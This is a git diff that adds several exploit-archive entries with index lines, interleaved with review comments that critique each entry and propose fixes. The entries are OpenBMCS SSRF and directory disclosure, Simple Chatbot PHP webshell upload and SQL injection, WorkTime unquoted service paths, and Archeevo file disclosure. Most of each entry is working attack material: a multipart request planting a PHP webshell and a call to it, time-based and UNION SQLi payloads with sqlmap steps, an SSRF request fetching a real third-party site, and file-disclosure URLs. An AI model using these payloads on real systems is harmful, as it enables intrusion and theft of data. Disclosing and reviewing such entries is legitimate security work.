+ +Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) + Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) + Apache/2.4.41 (Ubuntu) + Apache/2.4.25 (Debian) + nginx/1.16.1 + PHP/7.4.3 + PHP/7.0.33-0+deb9u9 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5694 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php + + +26.10.2021 + +-- + + +POST /php/query.php HTTP/1.1 +Host: 192.168.1.222 +Content-Length: 29 +Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://192.168.1.222 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://192.168.1.222/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +ip=www.columbia.edu:80&argu=/ + + +HTTP/1.1 302 Found +Date: Tue, 14 Dec 2021 20:26:47 GMT +Server: Apache/2.4.41 (Ubuntu) +Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Location: ../login.php +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 32141 + + + + + + + + + +Columbia University in the City of New York +... +... \ No newline at end of file diff --git a/exploits/php/webapps/50671.txt b/exploits/php/webapps/50671.txt new file mode 100644 index 000000000..45c2d069f --- /dev/null +++ b/exploits/php/webapps/50671.txt 
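Review bot: The demonstration request in 50670.txt names a real third-party host (`ip=www.columbia.edu:80`) and the quoted response includes that site's page title; a reserved name such as `ssrf-target.example.com` should be used so the entry does not direct traffic at an uninvolved party. The response deserves a sentence in `Desc:`: it is a `302 Found` with `Location: ../login.php`, yet `Content-Length: 32141` and the fetched page follow, which suggests the login redirect is sent without stopping the script. For detection this matters, because in a status-code-based log review the request looks like an ordinary redirect to login. The title says SSRF only, while the body heading and `Desc:` add RFI; the two should agree.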
@@ -0,0 +1,109 @@
+# Exploit Title: OpenBMCS 2.4 - Information Disclosure
+# Exploit Author: LiquidWorm
+# Date: 26/10/2021
+
+OpenBMCS 2.4 Secrets Disclosure
+
+
+Vendor: OPEN BMCS
+Product web page: https://www.openbmcs.com
+Affected version: 2.4
+
+Summary: Building Management & Controls System (BMCS). No matter what the
+size of your business, the OpenBMCS software has the ability to expand to
+hundreds of controllers. Our product can control and monitor anything from
+a garage door to a complete campus wide network, with everything you need
+on board.
+
+Desc: The application allows directory listing and information disclosure of
+some sensitive files that can allow an attacker to leverage the disclosed
+information and gain full BMS access.
+
+Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
+ Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
+ Apache/2.4.41 (Ubuntu)
+ Apache/2.4.25 (Debian)
+ nginx/1.16.1
+ PHP/7.4.3
+ PHP/7.0.33-0+deb9u9
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2022-5695
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php
+
+
+26.10.2021
+
+--
+
+
+https://192.168.1.222/debug/
+
+Index of /debug
+
+change_password_sqls
+clear_all_watches.php
+controllerlog/
+dash/
+dodgy.php
+fix_out.php
+graphics/
+graphics_diag.php
+graphics_ip_diag/
+jace_info.php
+kits/
+mysession.php
+nuke.php
+obix_test.php
+print_tree.php
+reboot_backdoor.php
+rerunSQLUpdates.php
+reset_alarm_trigger_times.php
+system/
+test_chris_obix.php
+timestamp.php
+tryEmail.php
+trysms.php
+unit_testing/
+userlog/
+
+...
+...
+
+/cache/
+/classes/
+/config/
+/controllers/
+/core/
+/css/
+/display/
+/fonts/
+/images/
+/js/
+/php/
+/plugins/
+/sounds/
+/temp/
+/tools/
+/core/assets/
+/core/backup/
+/core/crontab/
+/core/font/
+/core/fonts/
+/core/license/
+/core/load/
+/core/logout/
+/core/password/
+/php/audit/
+/php/phpinfo.php
+/php/temp/
+/php/templates/
+/php/test/
+/php/weather/
+/plugins/alarms/
+/tools/phpmyadmin/index.php
+/tools/migrate.php
\ No newline at end of file
diff --git a/exploits/php/webapps/50672.txt b/exploits/php/webapps/50672.txt
new file mode 100644
index 000000000..74cf94250
--- /dev/null
+++ b/exploits/php/webapps/50672.txt
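Review bot: The second list in 50671.txt (from `/cache/` to `/tools/migrate.php`) has no heading, and the `...` before it does not say what was elided, so it is unclear whether these paths are browsable directories, directly reachable scripts, or simply the application layout. `Desc:` speaks of "some sensitive files" without saying what kind of information the listed entries expose; naming the category (for example logs or phpinfo output) would let an operator prioritise. A remediation line is missing: disable directory indexes on the web server and remove or access-restrict `/debug/` and `/tools/` in deployed systems.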
@@ -0,0 +1,111 @@
+# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
+# Date: 18/01/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Windows 10
+
+
+# Exploit :
+
+You can upload a php shell file as a bot_avatar or user_avatar or image
+
+# ------------------------------------------------------------------------------------------
+# POC
+# ------------------------------------------------------------------------------------------
+
+# Request sent as base user
+
+POST /classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost.SA
+Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474
+Content-Length: 1121
+Connection: close
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="short_name"
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="intro"
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="no_result"
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: image/jpeg
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"
+Content-Type: application/octet-stream
+
+
+
+
+
+-----------------------------55217074722533208072616276474
+Content-Disposition: form-data; name="user_avatar"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------55217074722533208072616276474--
+
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Tue, 18 Jan 2022 00:51:29 GMT
+Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
+X-Powered-By: PHP/8.0.12
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 119
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+# ------------------------------------------------------------------------------------------
+# Request to webshell
+# ------------------------------------------------------------------------------------------
+
+GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1
+Host: localhost.SA
+Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
+Connection: close
+
+# ------------------------------------------------------------------------------------------
+# Webshell response
+# ------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Tue, 18 Jan 2022 00:51:29 GMT
+Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
+X-Powered-By: PHP/8.0.12
+Content-Length: 16
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
0xSaudi
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50673.txt b/exploits/php/webapps/50673.txt
new file mode 100644
index 000000000..b57507a5a
--- /dev/null
+++ b/exploits/php/webapps/50673.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi
+# Date: 18/01/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Windows 10
+
+# Steps
+# Go to : http://127.0.0.1/classes/Master.php?f=get_response
+# Save request in BurpSuite
+# Run saved request with sqlmap -r sql.txt
+
+======
+
+POST /classes/Master.php?f=get_response HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 73
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+Connection: Keep-alive
+
+message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
+
+======
+
+#Payloads
+
+#Payload (UNION query)
+message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -
+
+#(AND/OR time-based blind)
+message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
\ No newline at end of file
diff --git a/exploits/windows/local/50664.txt b/exploits/windows/local/50664.txt
new file mode 100644
index 000000000..104f03367
--- /dev/null
+++ b/exploits/windows/local/50664.txt
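Review bot: The only statement of required privilege in 50672.txt is the line `# Request sent as base user`, and the title carries no `(Authenticated)`/`(Unauthenticated)` tag the way the OpenBMCS entries in this commit do. The request includes a `PHPSESSID`, so a session is presumably needed, but the header should say so explicitly. The PoC also publishes what look like the researcher's own `PHPSESSID`, `_ga` and `_gid` cookie values, which would be better replaced with placeholders. Judging from the request and the later `GET /uploads/bot_avatar.php`, the root cause appears to be that `update_settings` stores the `bot_avatar` part under its client-supplied `.php` name inside a web-served directory. A one-line remediation note would make the entry usable by defenders: allow-list image extensions, rename on save, and disable script execution under `/uploads/`.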
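Review bot: The title of 50673.txt calls this a blind SQLi, yet the `#Payloads` section lists a `UNION query` payload next to the time-based one, so the title and the payload labels disagree about whether results are returned in-band. The entry also does not say whether `f=get_response` needs a login; the request carries a `PHPSESSID`, but a chatbot endpoint may well be public, and that changes the severity. A closing line naming the fix would complete the write-up: bind `message` as a parameter in a prepared statement instead of building the query from it, which is presumably what the application does today.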
@@ -0,0 +1,55 @@
+# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path
+# Discovery by: Yehia Elghaly
+# Date: 30-12-2021
+# Vendor Homepage: https://www.worktime.com/
+# Software Link: https://www.worktime.com/download/worktime_corporate.exe
+# Tested Version: 10.20 Build Build 4967
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 7 x86 - Windows Server 2016 x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+WorkTime Server srvWorkTimeServer
+C:\WorkTime\WorkTimeServerService.exe
+Auto
+
+WorkTime Reports Scheduler WorkTimeReportsScheduler
+C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe
+Auto
+
+WorkTime Client Watcher Service WTCWatch
+C:\Program Files\wtc\WTCWatch.exe WTCWatch
+Auto
+
+
+C:\Users\psycho>sc qc WorkTimeReportsScheduler
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WorkTimeReportsScheduler
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo
+rtsScheduler.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : WorkTime Reports Scheduler
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\psycho>sc qc WTCWatch
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WTCWatch
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : WorkTime Client Watcher Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/remote/50665.txt b/exploits/windows/remote/50665.txt
new file mode 100644
index 000000000..05409c6e6
--- /dev/null
+++ b/exploits/windows/remote/50665.txt
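Review bot: Of the three services in the `wmic` output in 50664.txt, only two have a space in an unquoted path. `C:\WorkTime\WorkTimeServerService.exe` contains no space and is not affected, and the write-up should say so rather than list it without comment (the `sc qc` output is, correctly, shown only for `WorkTimeReportsScheduler` and `WTCWatch`). The entry also stops at discovery: both affected binaries sit under `C:\Program Files`, so the practical impact depends on who can write to `C:\` and the install directories, and no ACL listing (for example from `icacls`) is included. For remediation, add that the fix is to wrap each service's `ImagePath` value in double quotes.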
@@ -0,0 +1,27 @@
+# Exploit Title: Archeevo 5.0 - Local File Inclusion
+# Google Dork: intitle:"archeevo"
+# Date: 01/15/2021
+# Exploit Author: Miguel Santareno
+# Vendor Homepage: https://www.keep.pt/
+# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
+# Version: < 5.0
+# Tested on: windows
+
+# 1. Description
+
+Unauthenticated user can exploit LFI vulnerability in file parameter.
+
+
+# 2. Proof of Concept (PoC)
+
+Access a page that don’t exist like /test.aspx and then you will be redirected to
+https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
+
+After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
+/web.config file of the application.
+
+https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
+
+
+# 3. Research:
+https://miguelsantareno.github.io/MoD_1.pdf
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3aa4a61c1..df690d1ec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
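Review bot: The header of 50665.txt contradicts itself on the affected release: the title says `Archeevo 5.0` while `# Version: < 5.0` excludes 5.0, so a reader cannot tell whether 5.0 is vulnerable or is the fixed build. One of the two lines needs correcting. What the PoC shows is a file under the application root being returned through the `file` parameter of `/error`, which is file disclosure rather than inclusion, and the placeholder host is misspelled (`vulnerable_webiste.com`). A mitigation line would help defenders: the error handler should map `StatusCode` to a fixed set of pages instead of accepting a path in `file`.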
@@ -11432,6 +11432,7 @@ id,file,description,date,author,type,platform,port 50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows, 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows, 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows, +50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18597,6 +18598,7 @@ id,file,description,date,author,type,platform,port 50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware, 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python, 50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows, +50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 
@@ -44743,3 +44745,13 @@ id,file,description,date,author,type,platform,port 50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,Himash,webapps,php, 50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",1970-01-01,Himash,webapps,php, 50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",1970-01-01,"Aryan Chehreghani",webapps,php, +50666,exploits/php/webapps/50666.txt,"Online Resort Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Gaurav Grover",webapps,php, +50667,exploits/php/webapps/50667.txt,"OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,php, +50668,exploits/php/webapps/50668.txt,"OpenBMCS 2.4 - SQLi (Authenticated)",1970-01-01,LiquidWorm,webapps,php, +50669,exploits/php/webapps/50669.txt,"OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,php, +50670,exploits/php/webapps/50670.txt,"OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)",1970-01-01,LiquidWorm,webapps,php, +50671,exploits/php/webapps/50671.txt,"OpenBMCS 2.4 - Information Disclosure",1970-01-01,LiquidWorm,webapps,php, +50672,exploits/php/webapps/50672.txt,"Simple Chatbot Application 1.0 - Remote Code Execution (RCE)",1970-01-01,"Saud Alenazi",webapps,php, +50673,exploits/php/webapps/50673.txt,"Simple Chatbot Application 1.0 - 'message' Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php, +50674,exploits/aspx/webapps/50674.txt,"Nyron 1.0 - SQLi (Unauthenticated)",1970-01-01,"Miguel Santareno",webapps,aspx, +50675,exploits/hardware/webapps/50675.txt,"Creston Web Interface 1.0.0.2159 - Credential Disclosure",1970-01-01,"RedTeam Pentesting GmbH",webapps,hardware,